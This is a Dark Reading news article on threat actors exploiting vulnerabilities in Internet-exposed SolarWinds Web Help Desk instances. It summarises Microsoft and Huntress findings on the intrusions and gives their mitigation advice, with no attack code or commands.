TechTarget and Informa Tech’s Digital Business Combine. Dark Reading Resource Library Black Hat News Omdia Cybersecurity Advertise NEWSLETTER SIGN-UP Cybersecurity Topics World The Edge DR Technology Events Resources VULNERABILITIES & THREATS CYBER RISK APPLICATION SECURITY THREAT INTELLIGENCE NEWS SolarWinds WHD Attacks Highlight Risks of Exposed Apps Organizations that have exposed their instances of Web Help Desk to the public Internet have inadvertently made them prime targets for attackers. Rob Wright, Senior News Director, Dark Reading February 10, 2026 3 Min Read SOURCE: TOFINO VIA ALAMY STOCK PHOTO Threat actors are pouncing on new vulnerabilities in SolarWinds Web Help Desk (WHD), further illustrating the risks of applications exposed to the public Internet. SolarWinds WHD is an IT support and asset management platform used by enterprises and government agencies. Several vendors in recent days have warned of exploitation of vulnerabilities in WHD, though it's not entirely clear which bugs are under attack. Last week, the US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551, a critical deserialization flaw, to the Known Exploited Vulnerabilities (KEV) Catalog. CVE-2025-40551 was initially disclosed by SolarWinds on Jan. 28, along with five other vulnerabilities in WHD. In a blog post last Friday, Microsoft said it observed multistage intrusions against WHD instances but said it couldn't determine whether the attacks exploited recent flaws or older vulnerabilities such as CVE-2025-26399, a critical remote code execution flaw disclosed in September 2025, which was a patch bypass for an earlier flaw, tracked as CVE-2024-28988, which itself was a patch bypass for an even older vulnerability. Related:Microsoft Patches 6 Actively Exploited Zero-Days "Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold," Microsoft wrote in its blog post. What is clear, however, is that some organizations have exposed their WHD instances on the public Internet, making them prime targets for attackers. Publicly Accessible WHDs at Higher Risk In the attacks observed by the Microsoft Defender Research Team, the threat actors used living-off-the-land (LotL) techniques and legitimate administrative tools like Zoho ManageEngine for lateral movement through victims' networks to target high-value assets. But the intrusions began with Internet-exposed WHD instances, which gave attackers an initial foothold in the network. "This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored," Microsoft wrote. After the threat actors successfully exploited the flaws, "the compromised service of a WHD instance spawned PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution," according to the blog post. Huntress observed similar activity targeting WHD instances. In a blog post on Sunday, Huntress researchers noted that in a Feb. 7 intrusion, the threat actors "rapidly deployed Zoho Meetings and Cloudflare tunnels for persistence" after gaining access via the WHD instance. Related:Second Round of Critical RCE Bugs in n8n Spikes Corporate Risk The threat actors also deployed Velociraptor, a digital forensics and incident response (DFIR) tool, for command-and-control (C2) purposes. A China-linked threat group tracked as Storm-2603 was observed in October 2025 abusing Velociraptor for ransomware attacks. Huntress warned that WHD administrative interfaces should not be publicly accessible on the Internet. Anna Pham, senior hunt and response analyst at Huntress and co-author of the blog post, tells Dark Reading that such exposure "dramatically lowers the bar" for attackers but isn't strictly a prerequisite for exploitation. "An attacker with any network access to a vulnerable WHD instance could potentially exploit the same flaws," Pham says. "Internet exposure simply makes these instances discoverable at scale and removes the need for any prior foothold." Last week, the Shadowserver Foundation said in a post on X that its Internet scans for CVE-2025-40551 show approximately 170 vulnerable WHD instances. Mitigating Threats to SolarWinds WHD Huntress urged organizations to put their WHD instances behind firewalls or VPNs and to remove direct Internet access to administrator paths. John Hammond, principal security researcher at Huntress and co-author of the blog post, says that while threat actors can exploit the flaws with local access to the instances, public exposure makes the application a target for "pray and spray" attacks by threat actors looking to gain initial access. Related:'Semantic Chaining' Jailbreak Dupes Gemini Nano Banana, Grok 4 Additionally, customers should update their WHD instances to version 2026.1 or later, and review the hosts for any unauthorized remote access tools like Zoho Assist and Velociraptor. Microsoft also recommended that organizations evict any remote monitoring and management (RMM) tools in the network like Zoho ManageEngine, as well as rotate credentials for WHD service and administrator accounts as well as any accounts reachable through the platform. About the Author Rob Wright Senior News Director, Dark Reading Rob Wright is a longtime reporter with more than 25 years of experience as a technology journalist. Prior to joining Dark Reading as senior news director, he spent more than a decade at TechTarget's SearchSecurity in various roles, including senior news director, executive editor and editorial director. Before that, he worked for several years at CRN, Tom's Hardware Guide, and VARBusiness Magazine covering a variety of technology beats and trends. Prior to becoming a technology journalist in 2000, he worked as a weekly and daily newspaper reporter in Virginia, where he won three Virginia Press Association awards in 1998 and 1999. He graduated from the University of Richmond in 1997 with a degree in journalism and English. A native of Massachusetts, he lives in the Boston area. More Insights Industry Reports ThreatLabz 2025 Ransomware Report The Total Economic Impact™ Of Zscaler Private Access (ZPA) Zscaler ThreatLabz 2025 VPN Risk Report GigaOm Radar for CNAPP The Total Economic Impact™ of Google SecOps Access More Research Webinars Ransomware and the Supply Chain: A Fireside Chat with the CISOs Who Literally Wrote the Book on Third-Party Risk The Hidden AI Attack Surface: How GenAI Tools Expand Data Exposure Risk Beyond the Model: The Expanded Attack Surface of AI Agents AI-Powered Threat Hunting: Staying Ahead of Evolving Attack Patterns AI-Powered Cloud Security Posture Management More Webinars You May Also Like VULNERABILITIES & THREATS Salesforce AI Agents Forced to Leak Sensitive Data by Nate Nelson, Contributing Writer SEP 25, 2025 VULNERABILITIES & THREATS Critical React Flaw Triggers Calls for Immediate Action by Rob Wright DEC 03, 2025 VULNERABILITIES & THREATS AI Agents Fail in Novel Ways, Put Businesses at Risk by Robert Lemos, Contributing Writer MAY 07, 2025 CYBERATTACKS & DATA BREACHES DeepSeek Breach Opens Floodgates to Dark Web by Emma Zaballos APR 22, 2025 Editor's Choice THREAT INTELLIGENCE EnCase Driver Weaponized as EDR Killers Persist byRob Wright FEB 5, 2026 4 MIN READ CYBERSECURITY OPERATIONS Extra Extra! Announcing DR Global Latin America byTara Seals FEB 4, 2026 2 MIN READ CYBER RISK TransUnion's Real Networks Deal Focuses on Robocall Blocking byJeffrey Schwartz FEB 9, 2026 2 MIN READ Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Ransomware and the Supply Chain: A Fireside Chat with the CISOs Who Literally Wrote the Book on Third-Party Risk THURS, FEB 19, 2026 AT1PM EST The Hidden AI Attack Surface: How GenAI Tools Expand Data Exposure Risk ON-DEMAND WEBINAR Beyond the Model: The Expanded Attack Surface of AI Agents THURS, FEB 26, 2026 AT 1PM EST AI-Powered Threat Hunting: Staying Ahead of Evolving Attack Patterns THURS, FEB 12, 2026 AT 11AM ET AI-Powered Cloud Security Posture Management WED, FEB 18,2026 AT 1:00PM EST More Webinars White Papers The Threat Prevention Buyer's Guide FInd the best AI-driven threat protection solution to stop file-based attacks. Assessing Security Architectures: Zero Trust vs. Network-Centric Models 5 Steps to Stop Ransomware With Zero Trust 10 Ways a Zero Trust Architecture Protects Against Ransomware Troubleshooting Guide for the Service Desk Teams Explore More White Papers GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE Discover More Black Hat Omdia Working With Us About Us Advertise Reprints Join Us NEWSLETTER SIGN-UP Follow Us Copyright © 2026 TechTarget, Inc. d/b/a Informa TechTarget. This website is owned and operated by Informa TechTarget, part of a global network that informs, influences and connects the world’s technology buyers and sellers. All copyright resides with them. Informa PLC’s registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. TechTarget, Inc.’s registered office is 275 Grove St. Newton, MA 02466. Home| Cookie Policy| Privacy| Terms of Use